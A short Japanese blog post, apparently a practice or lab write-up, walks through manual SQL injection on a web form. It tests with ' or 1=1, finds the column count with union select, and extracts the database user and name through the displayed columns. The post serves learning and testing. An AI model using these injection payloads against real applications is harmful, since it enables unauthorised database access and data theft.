Hello there, ('ω')ノ

 

こんなインジェクションもやっていなかったものかと。

 

 

まずは、正常動作確認を。

 

 

もうひとつ。

 

 

下記のいつものパターンを入力すると脆弱性があることがわかったので。

　' or 1=1 -- 

 

 

もう少し情報収集をしたいので、とりあえず下記のコードを入力すると。

Syntaxエラーがでたので。

　' union select 1,2,3,4,5 -- 

 

 

最後のコメントアウトのところを別のコードに変更してみると。

どうやら機能したみたいで。

ただ、カラム数がちがうとのことで。

　' union select 1,2,3,4,5 #

 

 

試行錯誤した結果、カラム数は7個らしく。

　' union select 1,2,3,4,5,6,7 #

 

 

表示されたカラムの箇所をつかって情報取集を。

　' union select 1,user(),database(),4,5,6,7 #

 

 

Best regards, (^^ゞ